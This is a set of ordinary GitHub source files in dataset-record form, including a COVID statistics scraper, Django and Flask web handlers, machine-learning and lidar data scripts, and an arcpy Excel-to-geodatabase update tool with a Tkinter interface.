\"{:.2f}\".format(spaceSavings) + \" %)\")\n\t\n\tsuggestions = []\n\t\n\tif not args.no_hilbert:\n\t\thilbertDifference = totalSizeWithoutHilbert - totalSize\n\t\thilbertPercentage = 100 * hilbertDifference / totalSizeWithoutHilbert\t\n\t\tsuggestions.append([hilbertPercentage, \"Hilbert mapping only saves you \" + str(hilbertDifference) + \" nibbles (\" + \"{:.2f}\".format(hilbertPercentage) + \" %) - consider using --no-hilbert to save tokens\"])\n\n\tif not args.no_rle:\n\t\trleDifference = totalSizeWithoutRLE - totalSize\n\t\trlePercentage = 100 * rleDifference / totalSizeWithoutRLE\n\t\tsuggestions.append([rlePercentage, \"RLE only saves you \" + str(rleDifference) + \" nibbles (\" + \"{:.2f}\".format(rlePercentage) + \" %) - consider using --no-rle to save tokens\"]) \n\n\tif not args.no_huffman:\n\t\thuffmanDifference = totalSizeWithoutHuffman - totalSize\n\t\thuffmanPercentage = 100 * huffmanDifference / totalSizeWithoutHuffman\n\t\tsuggestions.append([huffmanPercentage, \"Huffman coding only saves you \" + str(huffmanDifference) + \" nibbles (\" + \"{:.2f}\".format(huffmanPercentage) + \" %) - consider using --no-hilbert to save tokens\"])\n\t\n\tif len(suggestions) > 0:\n\t\tsuggestions = sorted(suggestions, key = lambda line: line[0])\n\t\tif suggestions[0][0] < 2:\n\t\t\tprint(suggestions[0][1])\n\t\t\n\tprint(\"Warning! Significant amount of data (\" + str(len(overflowData)) + \" nibbles) encoded in Lua, increasing the compressed size of your cart\")\n","repo_name":"jorikemppi/larkstongue","sub_path":"larkstongue/pack.py","file_name":"pack.py","file_ext":"py","file_size_in_byte":18252,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"18219010102","text":"from pymongo import errors\n\n# mongod --dbpath D:\\\\mgo\\\\drow\n\nasync def get_user(db, username=None, email=None, no_metadata=True):\n return await db.users.find_one(\n {'email': email} if email else {'_id': username},\n projection={'_id': False, 'key': False} if no_metadata else None)\n\n\nasync def insert_user(db, **kwobj):\n data = {'_id': kwobj.pop('username')}\n data.update(kwobj)\n data.setdefault(\"roles\", [])\n data['roles'].append(\"reg\")\n try:\n return await db.users.insert_one(data)\n except errors.DuplicateKeyError:\n return None\n\n\nasync def update_user(db, **kwobj):\n res = await db.users.update_one(\n {'_id': kwobj.pop('username')},\n {'$set': kwobj})\n return res.matched_count, res.modified_count\n\n\nasync def remove_user(db, username):\n return (await db.users.delete_one({'_id': username})).deleted_count or None\n","repo_name":"AbsoluteVirtue/m.pis21.2","sub_path":"store/mgo.py","file_name":"mgo.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3770283043","text":"import requests\nfrom lxml.html import fromstring\n\nimport pandas as pd\nimport json\n\nfrom unidecode import unidecode\n\nfrom datetime import datetime\n\nimport numpy as np\n\nfrom .utils import is_visible, highcharts_parser\nfrom .constants import AVAILABLE_COUNTRIES, AVAILABLE_CHARTS\n\n\ndef overview(as_json=False):\n \"\"\"\n This function retrieves the coronavirus data overview from all the available countries \n from worldometers.info/coronavirus/, which contains real time data and statistics from multiple\n features realted to the virus. 
For more information, please visit: https://www.worldometers.info/coronavirus/\n\n    Args:\n        as_json (:obj:`bool`):\n            set to `True` if overview wants to be retrieved as :obj:`json`, if not, \n            leave default value (`False`).\n\n    Returns:\n        :obj:`pandas.DataFrame` - overview\n            This function returns a :obj:`pandas.DataFrame` by default (if `as_json` parameter\n            is set to `False`, if `True` a :obj:`json` is returned), containing the world\n            overview coronavirus data.\n\n    Raises:\n        ValueError: raised if any of the introduced parameters is not valid\n        ConnectionError: raised if connection with Worldometers failed\n\n    \"\"\"\n\n    if not isinstance(as_json, bool):\n        raise ValueError(\"as_json parameter value can just be either True or False.\")\n\n    url = \"https://www.worldometers.info/coronavirus\"\n\n    req = requests.get(url)\n\n    if req.status_code != 200:\n        raise ConnectionError(\"Connection to Worldometers.info did not succeed, error code: \" + str(req.status_code))\n\n    root = fromstring(req.text)\n    table = root.xpath(\".//table[@id='main_table_countries_today'][1]\")[0]\n\n    thead = table.xpath(\".//thead/tr/th\")\n\n    columns = list()\n\n    for th in thead:\n        if is_visible(th) is True:\n            column = th.text_content().replace('\\n', '').replace(u'\\xa0', u'').strip()\n            columns.append(column)\n\n    tbody = table.xpath(\".//tbody/tr\")\n\n    rows = list()\n\n    for tr in tbody:\n        if is_visible(tr) is True:\n            rows.append([value.text_content().strip() for value in tr.xpath(\".//td\") if is_visible(value) is True])\n\n    data = pd.DataFrame(rows, columns=columns)\n\n    data.drop(columns=['#'], inplace=True)\n\n    data[\"Country,Other\"] = data['Country,Other'].str.replace(':', '')\n\n    cols = list(set(data.columns) - set(['Country,Other']))\n\n    data.replace('', '0', inplace=True)\n    data.replace('N/A', '0', inplace=True)\n\n    for col in cols:\n        data[col] = data[col].str.replace('+', '').str.replace(',', '').astype(float).astype(int)\n\n    if as_json is False:\n        return data\n    elif as_json is True:\n        return json.loads(json.dumps(data.to_dict(orient='records')))\n\n\ndef data(country, chart, as_json=False):\n    \"\"\"\n    This function retrieves the COVID data of the introduced chart for the introduced country \n    from worldometers.info/coronavirus/, which contains real time data and statistics from multiple\n    features related to the virus. 
\n\ndef data(country, chart, as_json=False):\n \"\"\"\n This function will retrieve the coronavirus data of the introduced chart from the introduced country \n from worldometers.info/coronavirus/, which contains real time data and statistics from multiple\n features related to the virus. For more information, please visit: https://www.worldometers.info/coronavirus/\n\n Args:\n country (:obj:`str`):\n name of the country to retrieve the COVID data from (available values at: \n `covid_daily.constants.AVAILABLE_COUNTRIES`)\n chart (:obj:`str`):\n name of the chart to retrieve the COVID data from (available values at: \n `covid_daily.constants.AVAILABLE_CHARTS`)\n as_json (:obj:`bool`):\n set to `True` if the data should be retrieved as :obj:`json`; if not, \n leave the default value (`False`).\n\n Returns:\n :obj:`pandas.DataFrame` - data\n This function returns a :obj:`pandas.DataFrame` by default (if `as_json` parameter\n is set to `False`, if `True` a :obj:`json` is returned), containing the COVID data \n of the introduced chart from the introduced country.\n\n Raises:\n ValueError: raised if any of the introduced parameters is not valid\n ConnectionError: raised if connection with Worldometers failed\n\n \"\"\"\n\n if not isinstance(country, str):\n raise ValueError(\"country must be a valid str.\")\n\n country = unidecode(country.strip().lower().replace(' ', '-'))\n\n if country not in AVAILABLE_COUNTRIES:\n raise ValueError(\"Introduced country is a valid value, but not a valid country.\")\n\n if not isinstance(chart, str):\n raise ValueError(\"chart must be a valid str.\")\n\n if chart not in AVAILABLE_CHARTS:\n raise ValueError(\"Introduced chart is a valid value, but not a valid chart.\")\n\n url = \"https://www.worldometers.info/coronavirus/country/\" + country + \"/\"\n \n req = requests.get(url)\n \n if req.status_code != 200:\n raise ConnectionError(\"Connection to Worldometers.info did not succeed, error code: \" + str(req.status_code))\n \n root = fromstring(req.text)\n scripts = root.xpath(\".//script\")\n \n flag = False\n\n for script in scripts:\n if not script.text_content().strip().__contains__(\"Highcharts.chart\"):\n continue\n\n chart_title = highcharts_parser(highchart_script=script, just_title=True)\n\n if chart_title != chart:\n continue\n\n chart = highcharts_parser(highchart_script=script)\n\n x = chart['series'][0]['data']\n y = [datetime.strptime(value, \"%b %d, %Y\") for value in chart['xAxis']['categories']]\n\n data = pd.DataFrame({'Date': y, chart['column']: x})\n data.set_index('Date', inplace=True)\n\n flag = True\n\n if not flag:\n raise RuntimeError(\"Information could not be retrieved since it is not available at Worldometers.info!\")\n\n return data\n
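\n# Usage sketch (illustrative; the chart name below is an assumption, real values\n# live in covid_daily.constants.AVAILABLE_CHARTS):\n#\n#   daily_cases = data(country='spain', chart='graph-cases-daily', as_json=False)\n#   daily_cases.plot()\n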
","repo_name":"alvarobartt/covid-daily","sub_path":"covid_daily/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"29"} +{"seq_id":"27862036184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLoad KITTI raw data with pykitti and export the data for SLAM.\n\nhttps://github.com/utiasSTARS/pykitti\n\npointclouds:\nThe pointclouds are saved in the velodyne coordinate system as txt: x y z\n\nstart pose:\nThe start pose is saved in the GPS/IMU coordinate system (UTM) as txt: x y yaw\n\nground truth:\nThe ground truth is a list of poses in the GPS/IMU coordinate system (UTM), \nsaved as txt: x y yaw\n\ncalib: 3x4 Transformation matrix (3x3 rotation matrix | 3x1 translation vector),\ntransform a point from GPS/IMU coordinate system to velodyne coordinate system,\nsaved as txt.\n\nAll coordinate systems as described in the KITTI readme. (see raw data \ndevelopment kit)\n\nPlease download the data and the raw data development kit:\nhttp://www.cvlibs.net/datasets/kitti/raw_data.php\n\n@author: Thorsten\n\"\"\"\n\nimport numpy as np\nimport pykitti\nimport utm\nimport os\n\n\"\"\"\nLoad kitti dataset\n\"\"\"\nbasedir = 'C:/KITTI'\ndate = '2011_09_30'\ndrive = '0027'\npathSave = basedir+'/'+date+'/'+date+'_'+drive+'_export/'\nif not os.path.exists(pathSave):\n os.makedirs(pathSave)\n\ndataset = pykitti.raw(basedir,date,drive)\ngpsImu = dataset.oxts\n\n\"\"\"\nExtract calibration (translation GPS/IMU -> Velodyne)\n\"\"\"\nT = np.matrix(dataset.calib.T_velo_imu[0:2,3]).transpose()\n\n\"\"\"\nProcess all measurements\n\"\"\"\ngroundTruth = []\nnr = 0\n\nfor scan in dataset.velo:\n print('Process measurement: '+str(nr))\n \n \"\"\"\n Extract and save pointcloud\n \"\"\"\n # get pointcloud (x y z intensity) and delete intensity\n pointcloud = np.asarray(scan)\n pointcloud = np.delete(pointcloud,3,1)\n \n # save pointcloud as txt\n #np.savetxt(pathSave+'pointcloud_'+str(nr)+'.txt',pointcloud,delimiter=',',fmt='%1.3f')\n \n # save pointcloud as binary \n np.save(pathSave+'pointcloudNP_'+str(nr),pointcloud)\n\n \"\"\"\n Extract ground truth and transform it to velodyne position\n \"\"\"\n pose = next(gpsImu)\n latitude = pose.packet.lat\n longitude = pose.packet.lon\n yaw = pose.packet.yaw\n # latitude and longitude to UTM\n posUtm = utm.from_latlon(latitude,longitude)\n posUtm = np.matrix([posUtm[0],posUtm[1]])\n # Rotation Matrix to rotate IMU2VELO translation vector\n R = np.matrix([[np.cos(yaw), -np.sin(yaw)],[np.sin(yaw),np.cos(yaw)]])\n \n # Rotate translation vector \n T_rot = R*T \n\n # Calculate Ground Truth at the position of the velodyne LIDAR\n posUtmTrans = posUtm-np.transpose(T_rot)\n \n # add position x y yaw to list\n groundTruth.append(np.matrix([posUtmTrans[0,0], posUtmTrans[0,1], pose.packet.yaw]))\n \n nr = nr + 1\n\n\"\"\"\nSave first pose\n\"\"\" \nnp.savetxt(pathSave+'firstPose.txt',groundTruth[0],delimiter=',',fmt='%1.3f')\n\n\"\"\" \nSave ground truth\n\"\"\"\ngroundTruth = np.vstack(groundTruth)\nnp.savetxt(pathSave+'groundTruth.txt',groundTruth,delimiter=',',fmt='%1.3f')\n\n\n","repo_name":"MouvementMondial/MappingWithKnownPoses","sub_path":"KittiExportRaw.py","file_name":"KittiExportRaw.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9016431497","text":"# Depth of a binary tree\n# Given the root node of a binary tree, compute the depth of the tree.\n# The nodes passed through from the root to a leaf (root and leaf nodes included) form one path of the tree; the length of the longest path is the depth of the tree.\n\n'''\nApproach:\nIf a tree has only a single node, its depth is 1.\nIf the root has only a left subtree and no right subtree, the depth of the tree is the depth of its left subtree plus 1.\nIf the root has only a right subtree and no left subtree, the same reasoning applies.\nIf it has both a left and a right subtree, the depth of the tree is the larger of the two subtree depths plus 1.\n'''\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def TreeDepth(self, pRoot):\n # write code here\n if not pRoot:\n return 0\n left = self.TreeDepth(pRoot.left)\n right = self.TreeDepth(pRoot.right)\n return max(left, right) + 1","repo_name":"Gustee/CodingInterview-Chinese-version2","sub_path":"chap6/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"72294266959","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.externals import joblib\n\ndef max_iter(train_X, train_Y, testX, 
targetTest):\n iterations = np.linspace(200, 1000, 100, endpoint=True)\n train_results = []\n test_results = []\n for i in iterations:\n # nn = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(int(neurons)), random_state=0)\n nn = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(125), random_state=0, max_iter=int(i))\n nn.fit(train_X, train_Y)\n\n train_pred = nn.predict(train_X)\n\n trainAcc = accuracy_score(train_Y, train_pred)\n train_results.append(trainAcc)\n\n y_predTest = nn.predict(testX)\n\n testAcc = accuracy_score(targetTest, y_predTest)\n test_results.append(testAcc)\n\n line1, = plt.plot(iterations, train_results, 'b', label='Train Accuracy')\n line2, = plt.plot(iterations, test_results, 'r', label='Test Accuracy')\n\n plt.legend(handler_map={line1: HandlerLine2D(numpoints=2)})\n plt.interactive(False)\n plt.ylabel('Accuracy')\n plt.xlabel('number of iterations')\n plt.show()\n\ndef numberOfNeurons(train_X, train_Y, testX, targetTest):\n num_neurons = np.linspace(1, 200, 200, endpoint=True)\n train_results = []\n test_results = []\n for neurons in num_neurons:\n # nn = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(int(neurons)), random_state=0)\n nn = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(int(neurons), 125), random_state=0)\n nn.fit(train_X, train_Y)\n\n train_pred = nn.predict(train_X)\n\n trainAcc = accuracy_score(train_Y, train_pred)\n train_results.append(trainAcc)\n\n y_predTest = nn.predict(testX)\n\n testAcc = accuracy_score(targetTest, y_predTest)\n test_results.append(testAcc)\n\n line1, = plt.plot(num_neurons, train_results, 'b', label='Train Accuracy')\n line2, = plt.plot(num_neurons, test_results, 'r', label='Test Accuracy')\n\n plt.legend(handler_map={line1: HandlerLine2D(numpoints=2)})\n plt.interactive(False)\n plt.ylabel('Accuracy')\n plt.xlabel('number of neurons')\n plt.show()\n\n\n# ###Dataset 1\ndf = np.genfromtxt('DataSet-Release 1/ds1/ds1Info.csv', delimiter=',')\ndf_alpha_numeric = np.genfromtxt('DataSet-Release 1/ds1/ds1Train.csv', delimiter=',')\ndf_alpha_numeric_validation = np.genfromtxt('DataSet-Release 1/ds1/ds1Val.csv', delimiter=',')\n\ntrain_X = df_alpha_numeric[:, :1024]\ntrain_Y = df_alpha_numeric[:, 1024]\n\ntestX = df_alpha_numeric_validation[:, :1024]\ntargetTest = df_alpha_numeric_validation[:, 1024]\n# numberOfNeurons(train_X, train_Y, testX, targetTest)\n\n# max_iter(train_X, train_Y, testX, targetTest)\n\nclassifier = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(110), random_state=0, max_iter=440)\nclassifier.fit(train_X, train_Y)\n\njoblib.dump(classifier, 'nn1classifier.joblib')\n\npredictedTarget = classifier.predict(testX)\nprint('Dataset1 training accuracy')\nprint(accuracy_score(predictedTarget, targetTest))\n\n\n###Dataset 2\ndf1 = np.genfromtxt('DataSet-Release 1/ds2/ds2Info.csv', delimiter=',')\ndf_greek = np.genfromtxt('DataSet-Release 1/ds2/ds2Train.csv', delimiter=',')\ndf_greek_valid = np.genfromtxt('DataSet-Release 1/ds2/ds2Val.csv', delimiter=',')\n\ntrain_GreekX = df_greek[:, :1024]\ntrain_GreekY = df_greek[:, 1024]\n\ntestGreekX = df_greek_valid[:, :1024]\ntestGreekTarget = df_greek_valid[:, 1024]\n\n# numberOfNeurons(train_GreekX, train_GreekY, testGreekX, testGreekTarget)\n# max_iter(train_GreekX, train_GreekY, testGreekX, testGreekTarget)\nclassifier2 = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(125), random_state=0, max_iter=250)\nclassifier2.fit(train_GreekX, train_GreekY)\n\njoblib.dump(classifier2, 
'nn2classifier.joblib')\n\npredictGreek = classifier2.predict(testGreekX)\nprint('Dataset 2')\nprint(accuracy_score(testGreekTarget, predictGreek))\n","repo_name":"ayushbahuguna8005/AI-Project2","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43969336377","text":"\"\"\"\nDefinition of views.\n\"\"\"\n\nfrom django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.template import RequestContext\nfrom datetime import datetime\n\ndef home(request):\n \"\"\"Renders the home page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Home Page',\n 'year':datetime.now().year,\n }\n )\n\ndef contact(request):\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/contact.html',\n {\n 'title':'Contact',\n 'message':'Your contact page.',\n 'year':datetime.now().year,\n }\n )\n\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title':'About',\n 'message':'Your application description page.',\n 'year':datetime.now().year,\n }\n )\n\ndef invite(request, code):\n \"\"\"Renders the invite page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/invite.html',\n {\n 'title':'Invite',\n 'message':'Invite it.',\n 'year':datetime.now().year,\n 'code':code,\n }\n )\n\nfrom app.forms import CodeForm\n\ndef askcode(request):\n \"\"\"Renders the ask code page.\"\"\"\n assert isinstance(request, HttpRequest)\n form_class = CodeForm\n return render(\n request,\n 'app/askcode.html',\n {\n 'title':'Ask code',\n 'message':'Do ask code.',\n 'form':form_class,\n 'year':datetime.now().year\n }\n )\n\nimport json\nfrom django.http import HttpResponse\nfrom app.models import alumni as Alumnus\nfrom app.models import invites as Invite\n\ndef generate_code(request):\n code = request.GET['code']\n alumnus_id = request.GET['id']\n inviter = Invite.objects.get(code=code).alumni\n invitee = Alumnus.objects.get(alumnus_id = alumnus_id)\n inv = Invite(alumni_id = alumnus_id)\n inv.save()\n data = {\n 'code': inv.code,\n 'invitee': unicode(invitee),\n 'invitee_name': invitee.full_name,\n 'inviter': unicode(inviter),\n }\n return HttpResponse(json.dumps(data), 'application/json')\n\n\ndef get_alumni(request):\n #if request.is_ajax():\n q = request.GET.get('term', '')\n als = Alumnus.objects.filter(full_name__icontains = q )[:20]\n results = []\n for al in als:\n al_json = {}\n al_json['id'] = al.alumnus_id\n al_json['label'] = unicode(al)\n al_json['value'] = al.full_name\n results.append(al_json)\n data = json.dumps(results)\n #else:\n # data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n","repo_name":"mxposed/alumni-auth","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"71178464398","text":"import operator\n\ninterestingWordsAndCount = {}\n\ndef loadInCommonWords():\n\tfin = open('100MostCommonWords.txt')\n\tfor line in fin:\n\t\treturn set(line.split(', '))\n\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef getIntPart(val):\n\ttoReturn = \"\"\n\tfor char in 
val:\n\t\tif(RepresentsInt(char)):\n\t\t\ttoReturn += char\n\treturn int(toReturn)\n\ndef makeGoInteresting(commonWords):\n\tfin = open('wordsLogFile.txt')\n\tfor line in fin:\n\t\tfor word in line.split('{')[1].split(','):\n\t\t\tif not word.split(':')[0] in commonWords:\n\t\t\t\tif(len(word.split(':')) == 2):\n\t\t\t\t\tif(word.split(':')[0] in interestingWordsAndCount):\n\t\t\t\t\t\tif(RepresentsInt(word.split(':')[1])):\n\t\t\t\t\t\t\tinterestingWordsAndCount[word.split(':')[0]] += int(word.split(':')[1])\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(RepresentsInt(word.split(':')[1])):\n\t\t\t\t\t\t\tinterestingWordsAndCount[word.split(':')[0]] = int(word.split(':')[1])\n\n\timport operator\n\tinterestingWordsAndCountSorted = sorted(interestingWordsAndCount.iteritems(), key=operator.itemgetter(1))\n\treturn interestingWordsAndCountSorted\n\ndef saveDictionary(dictionary):\n\timport csv\n\tw = csv.writer(open(\"interestingWords.csv\", \"w\"))\n\tfor key in dictionary:\n\t w.writerow(key)\n\nif __name__ == '__main__':\n\tsaveDictionary(makeGoInteresting(loadInCommonWords()))\n\n\n","repo_name":"ThomasTheDane/DataScience2014CDC","sub_path":"makeInteresting.py","file_name":"makeInteresting.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28908731231","text":"class ListNode:\n def __init__(self, key, prev=None, next=None):\n self.key = key\n self.prev = prev\n self.next = next\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def search(self, k):\n x = self.head\n while x is not None and x.key != k:\n x = x.next\n return x\n\n def prepend(self, x):\n x.prev = None\n x.next = self.head\n if self.head is not None:\n self.head.prev = x\n self.head = x\n\n def insert(self, x, y=None):\n if y is None:\n self.prepend(x)\n else:\n x.next = y.next\n x.prev = y\n if y.next is not None:\n y.next.prev = x\n y.next = x\n\n def delete(self, x):\n if x.prev is not None:\n x.prev.next = x.next\n else:\n self.head = x.next\n if x.next is not None:\n x.next.prev = x.prev\n\n\nclass LinkedListWithSentinel:\n def __init__(self):\n self.null = ListNode(None)\n self.null.prev = self.null\n self.null.next = self.null\n\n def search(self, k):\n self.null.key = k\n x = self.null.next\n while x.key != k:\n x = x.next\n return None if x == self.null else x\n\n def prepend(self, x):\n self.insert(x)\n\n def insert(self, x, y=None):\n if y is None:\n y = self.null\n x.next = y.next\n x.prev = y\n y.next.prev = x\n y.next = x\n\n def delete(self, x):\n x.prev.next = x.next\n x.next.prev = x.prev\n\n\n__all__ = [\"ListNode\", \"LinkedList\", \"LinkedListWithSentinel\"]\n","repo_name":"1290185595/Introduction-to-Algorithms","sub_path":"Part3/Chapter1/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4856319594","text":"import os\nimport shutil\nimport numpy as np\n\nsource = r\"C:\\work\\parse\\photos\"\nresult = 'blb_city'\nserial_name = 'blb'\n\nos.mkdir(result)\n\ndata = os.listdir(source)\n\nn_photos = len(data)\n\nmax_frames = 100\nmax_episode = 999\nmark = 'left'\nn_seasons = int(np.ceil(n_photos/(max_frames*max_episode)))\nseason1 = 2\nfor season in range(n_seasons):\n path_to_season = os.path.join(result, f'{serial_name}.{season1+1:03d}')\n os.mkdir(path_to_season)\n n_episode = int(min(max_episode, np.ceil(\n n_photos/max_frames-max_episode*season)))\n for 
episode in range(n_episode):\n path_to_episode_frames = os.path.join(\n path_to_season, f'{serial_name}.{season1+1:03d}.{episode+1:03d}.{mark}')\n os.mkdir(path_to_episode_frames)\n n_frames = int(min(max_frames, np.ceil(\n n_photos-(max_episode*season+episode)*max_frames)))\n for frame in range(n_frames):\n file = data.pop()\n file_format = file.split('.')[-1]\n if file_format == 'jpeg':\n file_format = 'jpg'\n shutil.copy(os.path.join(source, file), os.path.join(\n path_to_episode_frames, f'{serial_name}.{season1+1:03d}.{episode+1:03d}.{mark}.{frame:06d}.{file_format}'))\n","repo_name":"edkochak/SegmentMarker_to_yolo","sub_path":"nonmark_to_segmentmarker.py","file_name":"nonmark_to_segmentmarker.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31677190390","text":"from flask import Blueprint, request, jsonify, make_response\nfrom app import sqlDB, marsh\nfrom app.models.aeroporto import Aeroporto, AeroportoSchema\n\n\nclass AirportController:\n airport_controller = Blueprint(\n name='aeroporto_controller', import_name=__name__)\n\n @airport_controller.route('/aeroportos', methods=['GET'])\n def get_airports():\n aeroporto_list = Aeroporto.query.all()\n aeroporto_schema = AeroportoSchema(many=True)\n aeroporto_json = aeroporto_schema.dump(aeroporto_list)\n return make_response(jsonify({\"Aeroportos\": aeroporto_json}), 200)\n\n @airport_controller.route('/aeroportos/<iata>', methods=['GET'])\n def get_airport(iata):\n aeroporto = Aeroporto.query.filter_by(codigo_iata=iata).first()\n if aeroporto:\n aeroporto_schema = AeroportoSchema()\n aeroporto_json = aeroporto_schema.dump(aeroporto)\n return make_response(jsonify({\"Aeroporto\": aeroporto_json}), 200)\n else:\n return make_response(jsonify({\"Aeroporto\": None}), 404)\n\n @airport_controller.route('/aeroportos', methods=['POST'])\n def post_airport():\n data = request.get_json()\n aeroporto_schema = AeroportoSchema(unknown=marsh.EXCLUDE)\n aeroporto = aeroporto_schema.load(data)\n result = aeroporto_schema.dump(aeroporto.create())\n return make_response(jsonify({\"Aeroporto\": result}), 201)\n\n @airport_controller.route('/aeroportos/<iata>', methods=['PUT'])\n def put_airport(iata):\n aeroporto = Aeroporto.query.filter_by(codigo_iata=iata).first_or_404()\n aeroporto_schema = AeroportoSchema()\n data = request.get_json()\n\n if data.get('nome_aeroporto'):\n aeroporto.nome_aeroporto = data['nome_aeroporto']\n if data.get('codigo_iata'):\n aeroporto.codigo_iata = data['codigo_iata']\n if data.get('cidade'):\n aeroporto.cidade = data['cidade']\n if data.get('pais'):\n aeroporto.pais = data['pais']\n if data.get('latitude'):\n aeroporto.latitude = data['latitude']\n if data.get('longitude'):\n aeroporto.longitude = data['longitude']\n if data.get('altitude'):\n aeroporto.altitude = data['altitude']\n\n sqlDB.session.add(aeroporto)\n sqlDB.session.commit()\n\n update_aeroporto = aeroporto_schema.dump(aeroporto)\n return make_response(jsonify({\"Aeroporto\": update_aeroporto}), 200)\n\n @airport_controller.route('/aeroportos/<iata>', methods=['DELETE'])\n def delete_airport(iata):\n aeroporto = Aeroporto.query.filter_by(codigo_iata=iata).first_or_404()\n sqlDB.session.delete(aeroporto)\n sqlDB.session.commit()\n return make_response(jsonify(), 204)\n
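\n# Example requests (illustrative; assumes the blueprint is registered at the application root):\n#   GET    /aeroportos       -> list every airport\n#   GET    /aeroportos/GRU   -> fetch a single airport by its IATA code\n#   DELETE /aeroportos/GRU   -> remove it (returns 204 on success)\n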
","repo_name":"LuizHnrqB/apiaeroportos","sub_path":"app/controllers/aerporto_controller.py","file_name":"aerporto_controller.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13673531652","text":"from __future__ import division\r\nimport sys\r\nimport os\r\n\r\n#Add Module folder to path.\r\n #Module folder contains openpyxl instead of installing it from pip to make it more user friendly\r\nopenpyxl_module = \"Modules\"\r\nmodule_path = os.path.join(os.path.dirname(__file__), openpyxl_module)\r\nsys.path.append(module_path)\r\n\r\nimport openpyxl\r\nimport arcpy\r\n\r\nfrom datetime import datetime\r\n\r\n#Location of user selected Excel file\r\nexcelfile_loc = \"\"\r\n\r\n\r\n#User variables\r\nsheetName = \"Table1\" #Name of the Excel sheet to import\r\nimportTableName = \"Import\" #Name of resulting table after importing the Excel file\r\ngdbFeatureName = \"FeatureClass\" #Name of the feature class within the GDB to update\r\njoinFieldGDB = \"PrimaryKey_1\" #Name of the field used to join with the Excel Sheet\r\njoinFieldExcel = \"PrimaryKey_2\" #Name of the field used to join with the Feature Class\r\njoinFields = [\"Field_1\", \"Field_2\"] #List of fields to join between the Excel Sheet and the Feature Class\r\n\r\n#Imports the specified excel sheet into the specified file geodatabase\r\ndef importSheet(excel_loc, output_loc, sheet_name):\r\n arcpy.management.Delete(output_loc)\r\n arcpy.ExcelToTable_conversion(excel_loc, output_loc, sheet_name)\r\n\r\n#Runs when user clicks \"Update\" button.\r\n #arcpy.env.workspace is updated to user selected gdb\r\ndef updateFunction():\r\n importSheet(excelfile_loc, importTableName, sheetName)\r\n arcpy.management.JoinField(gdbFeatureName, joinFieldGDB, importTableName, joinFieldExcel, joinFields)\r\n arcpy.management.Delete(importTableName)\r\n pass\r\n \r\n##################################################################################################\r\n#\r\n# GUI Code\r\n#\r\n##################################################################################################\r\n\r\n\r\nfrom Tkinter import *\r\nimport tkFileDialog as filedialog\r\nimport tkMessageBox as messagebox\r\n\r\nroot = Tk()\r\nroot.title(\"Update GDB from Excel\")\r\nscrollbar = Scrollbar(orient=\"horizontal\")\r\nfileentry = Entry(root, xscrollcommand=scrollbar.set, width=100)\r\nfileentry.focus()\r\nfileentry.grid(row=0, column=1, sticky=\"w\")\r\nscrollbar.grid(row=1, column=1, ipadx=275, sticky=\"w\")\r\nscrollbar.config(command=fileentry.xview)\r\nfileentry.config()\r\n\r\ndef selectexcel():\r\n x = filedialog.askopenfilename(title=\"Select File\")\r\n datafile = x\r\n fileentry.delete('0', END)\r\n fileentry.insert(END, datafile)\r\n\r\ndataselect = Button(root, text=\"Select Excel Sheet\", padx=50, command=selectexcel)\r\ndataselect.grid(row=0, column=0)\r\n\r\n\r\nscrollbar2 = Scrollbar(orient=\"horizontal\")\r\nfoldentry = Entry(root, xscrollcommand=scrollbar2.set, width=100)\r\nfoldentry.focus()\r\nfoldentry.grid(row=2, column=1, sticky=\"w\")\r\nscrollbar2.grid(row=3, column=1, 